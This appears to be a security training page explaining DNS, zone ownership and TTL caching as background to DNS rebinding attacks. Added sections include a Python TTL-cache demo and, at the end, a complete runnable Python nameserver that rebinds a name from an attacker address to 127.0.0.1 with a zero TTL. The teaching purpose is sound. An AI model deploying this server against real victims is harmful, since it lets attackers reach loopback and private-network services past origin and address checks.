Introduction

DNS Rebinding is an attack technique that abuses the attacker's control over their own DNS zone to bypass security measures that rely on where a domain name resolves, for instance filters that validate a host once and then trust every later request to it. Before learning how to identify web applications vulnerable to DNS Rebinding and then exploit them, let us quickly recap the basics of DNS.


Recap: Domain Name System (DNS)

The Domain Name System (DNS) is a hierarchical system that resolves domain names to IP addresses (such as resolving academy.hackthebox.com to 104.18.21.126 (IPv4) or 2606:4700::6812:157e (IPv6)); its structure resembles a tree. A contiguous part of this tree that is administered as one unit and served by the same authoritative nameservers is called a DNS zone.

Domain Hierarchy:

         [Root]
            │
    ┌───────┼───────┬───────┬───────┐
   net     org     com     dev     io
                    │
            [inlanefreight.com]  ← Second-level domain
                    │
         ┌──────────┼──────────┐
        dev        www       mail   ← Sub-domains
          │
   WS01.dev.inlanefreight.com      ← Host

Domain names are resolved from right to left, i.e., starting at the root and the top-level domain, moving to the second-level domain, and subsequently through each sub-domain label until the host is reached.


DNS Zone Ownership

For DNS Rebinding attacks, it is essential to understand that whoever controls a DNS zone also controls every record in it. In the above diagram, the zone owner administers the inlanefreight.com zone and all of its subdomains.

Therefore, the zone owner can freely configure the DNS settings for their zone, including:

  • Adding entries for new subdomains

  • Deleting entries for existing subdomains

  • Reconfiguring the IP address that a domain name resolves to

Example: The inlanefreight.com zone's owner can configure the domain www.inlanefreight.com to resolve to 1.2.3.4 in the morning and reconfigure it to resolve to 5.6.7.8 at night; one use case for this might be load-balancing via DNS.

Important: The zone owner can configure their domains to resolve to ANY IP address. The address does not have to belong to the zone owner, and the system behind it neither knows about nor has to agree to the zone owner's DNS configuration; a record that makes www.inlanefreight.com resolve to a loopback or private address such as 127.0.0.1 or 10.0.0.5 is perfectly valid DNS.


DNS Caching and TTL

Another essential part of DNS is caching. Suppose we interact with the same service for an extended period; performing a DNS lookup before each request to that service would cause considerable overhead.

For instance, when interacting with academy.hackthebox.com, students send numerous HTTP requests to it; without DNS caching, the domain name must be looked up with DNS before each HTTP request.

Thus, DNS responses are cached for a specified time before a new DNS lookup is required. This amount of time is called time-to-live (TTL); it is set per record by the zone owner and determines for how many seconds the resolved IP address may be reused before the domain name must be resolved again with a DNS request. Note that the TTL is an upper bound that caching resolvers and browsers may clamp with minimum lifetimes of their own, so a record's TTL and the time a client actually keeps using an address are not always the same.

Example DNS Lookup

In a dig lookup, the TTL appears in the ANSWER SECTION as the number immediately after the resolved domain name, followed by the class, the record type, and the address. In the lookup referred to here, the TTL is 300 seconds (equivalent to 5 minutes).
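To make the caching behaviour concrete, here is an added example (not code from the original page or from Hack The Box) that parses ANSWER SECTION lines in dig's format and keeps a small TTL-driven cache, as a resolver would. The sample answer lines, the nocache.example.com name and the address 198.51.100.7 are constructed for the example; only the academy.hackthebox.com record reuses the values from the recap above.

```python
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Callable, Optional

# One line of dig's ANSWER SECTION: owner name, TTL (seconds), class, type, record data.
ANSWER_RE = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+(A|AAAA|CNAME)\s+(\S+)$")

# Constructed sample answer lines in dig's presentation format (not captured output).
SAMPLE_ANSWERS = {
    "academy.hackthebox.com": "academy.hackthebox.com.  300  IN  A     104.18.21.126",
    "nocache.example.com":    "nocache.example.com.     0    IN  A     198.51.100.7",
}


@dataclass
class Record:
    name: str
    ttl: int
    rtype: str
    rdata: str


def parse_answer_line(line: str) -> Record:
    """Parse one ANSWER SECTION line; the TTL is the number right after the name."""
    m = ANSWER_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a dig answer line: {line!r}")
    name, ttl, rtype, rdata = m.groups()
    return Record(name.rstrip(".").lower(), int(ttl), rtype, rdata)


class TtlCache:
    """Caches records until their TTL elapses, the way a stub or recursive resolver does."""

    def __init__(self) -> None:
        self._entries = {}  # name -> (record, absolute expiry time)

    def put(self, record: Record, now: float) -> None:
        self._entries[record.name] = (record, now + record.ttl)

    def get(self, name: str, now: float) -> Optional[Record]:
        """Return the record with its remaining TTL, or None once it has expired."""
        key = name.rstrip(".").lower()
        entry = self._entries.get(key)
        if entry is None:
            return None
        record, expires = entry
        remaining = expires - now
        if remaining <= 0:  # TTL exhausted; a TTL of 0 expires immediately
            del self._entries[key]
            return None
        return Record(record.name, int(remaining), record.rtype, record.rdata)


def resolve(cache: TtlCache, name: str, lookup: Callable[[str], str], now: float) -> tuple[str, bool]:
    """Return (address, served_from_cache); `lookup` is only called on a cache miss."""
    hit = cache.get(name, now)
    if hit is not None:
        return hit.rdata, True
    record = parse_answer_line(lookup(name))
    cache.put(record, now)
    return record.rdata, False


if __name__ == "__main__":
    cache = TtlCache()
    for t in (0, 150, 299, 300):
        print(t, resolve(cache, "academy.hackthebox.com", SAMPLE_ANSWERS.__getitem__, t))
```

With the 300-second record, every request in the first five minutes is answered from the cache and only the request at second 300 triggers a new lookup; the zero-TTL record is never served from the cache at all, which is the behaviour a rebinding attacker relies on. Real resolvers and browsers may add their own minimum cache lifetime on top of this, so the clamping mentioned above has to be accounted for when a low TTL matters.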


DNS Rebinding Attack Concept

As we will learn in the upcoming sections, attackers use DNS Rebinding, combined with a low TTL, to change which IP address their own domain name resolves to between requests. A check performed against the first address therefore no longer holds for the address used afterwards, which is what lets the technique bypass faulty filters and other security measures.

In a DNS rebinding attack, an attacker:

  1. Configures a low TTL on their domain

  2. Changes the IP address the domain resolves to between subsequent requests, so that the first lookup and later lookups of the same name return different addresses

We will explore this in more detail in the following sections.
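The two steps above, as an added example that is not part of the original page or of any Hack The Box tooling: a minimal authoritative nameserver, written with the Python standard library only, that answers the first query for a name with the attacker's address and every later query with the target address, using a TTL of 0. The addresses 198.51.100.10 (standing in for the attacker's web server) and 127.0.0.1 (the rebinding target), the name rebind.example.com and the port 5353 are assumptions chosen for the example; in practice the attacker's zone would delegate the name to this server with an NS record, which is outside what this snippet does.

```python
import socket
import struct
from typing import Optional

# Constructed addresses for this example (not from the page).
ATTACKER_IP = "198.51.100.10"   # TEST-NET-2 address standing in for the attacker host
TARGET_IP = "127.0.0.1"         # address the victim should be rebound to
REBIND_TTL = 0                  # seconds; 0 tells caches to look the name up again next time


def encode_name(name: str) -> bytes:
    """Encode a dotted name as DNS wire-format labels (length byte + label, 0-terminated)."""
    out = b"".join(bytes([len(label)]) + label.encode("ascii")
                   for label in name.rstrip(".").split("."))
    return out + b"\x00"


def decode_name(data: bytes, offset: int) -> tuple[str, int]:
    """Decode an uncompressed name at `offset`; return (dotted name, offset after it)."""
    labels = []
    while data[offset] != 0:
        length = data[offset]
        labels.append(data[offset + 1:offset + 1 + length].decode("ascii"))
        offset += 1 + length
    return ".".join(labels), offset + 1


def build_query(name: str, txid: int = 0x1234, qtype: int = 1) -> bytes:
    """Build a standard recursive query (default type A) so the server can be driven offline."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def build_response(query: bytes, ip: str, ttl: int) -> bytes:
    """Answer the single question in `query` with one A record; other types get no answer."""
    txid = struct.unpack("!H", query[:2])[0]
    _, end = decode_name(query, 12)
    qtype = struct.unpack("!H", query[end:end + 2])[0]
    question = query[12:end + 4]
    if qtype != 1:  # only A is served; reply authoritatively with an empty answer section
        return struct.pack("!HHHHHH", txid, 0x8400, 1, 0, 0, 0) + question
    # Flags 0x8400: QR=1 (response), AA=1 (authoritative). The answer's owner name is a
    # compression pointer (0xC00C) back to the question name at offset 12.
    header = struct.pack("!HHHHHH", txid, 0x8400, 1, 1, 0, 0)
    rdata = socket.inet_aton(ip)
    answer = struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, len(rdata)) + rdata
    return header + question + answer


def parse_answer(response: bytes) -> Optional[tuple[str, int]]:
    """Return (ip, ttl) of the first answer in a response from build_response, or None."""
    if struct.unpack("!H", response[6:8])[0] == 0:  # ANCOUNT
        return None
    _, end = decode_name(response, 12)
    ans = end + 4  # skip QTYPE and QCLASS
    _, _, _, ttl, rdlength = struct.unpack("!HHHIH", response[ans:ans + 12])
    return socket.inet_ntoa(response[ans + 12:ans + 12 + rdlength]), ttl


class RebindingServer:
    """Authoritative server that rebinds each name after its first lookup.

    The first query for a name returns the attacker's address (to serve the malicious
    page); every later query returns the target address. The TTL of 0 makes the switch
    take effect at the victim's next lookup rather than minutes later.
    """

    def __init__(self, attacker_ip=ATTACKER_IP, target_ip=TARGET_IP, ttl=REBIND_TTL):
        self.attacker_ip, self.target_ip, self.ttl = attacker_ip, target_ip, ttl
        self.seen = set()

    def handle(self, query: bytes) -> bytes:
        qname = decode_name(query, 12)[0].lower()
        rebound = qname in self.seen
        self.seen.add(qname)
        return build_response(query, self.target_ip if rebound else self.attacker_ip, self.ttl)

    def serve(self, bind_addr: str = "0.0.0.0", port: int = 5353) -> None:
        """Answer UDP queries forever; port 5353 avoids needing root for port 53."""
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.bind((bind_addr, port))
        while True:
            data, peer = sock.recvfrom(512)
            sock.sendto(self.handle(data), peer)


if __name__ == "__main__":
    RebindingServer().serve()
```

Run stand-alone, the script listens on UDP 5353 and can be queried with `dig @127.0.0.1 -p 5353 rebind.example.com A`; the first answer carries 198.51.100.10 and every further answer 127.0.0.1, each with a TTL of 0. The per-name state is deliberately simple; real tooling keys the state per client or alternates on each request, but the mechanism that the following sections build on is exactly this: the attacker's own authoritative server decides what the name resolves to, and a short TTL decides how soon the victim asks again.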
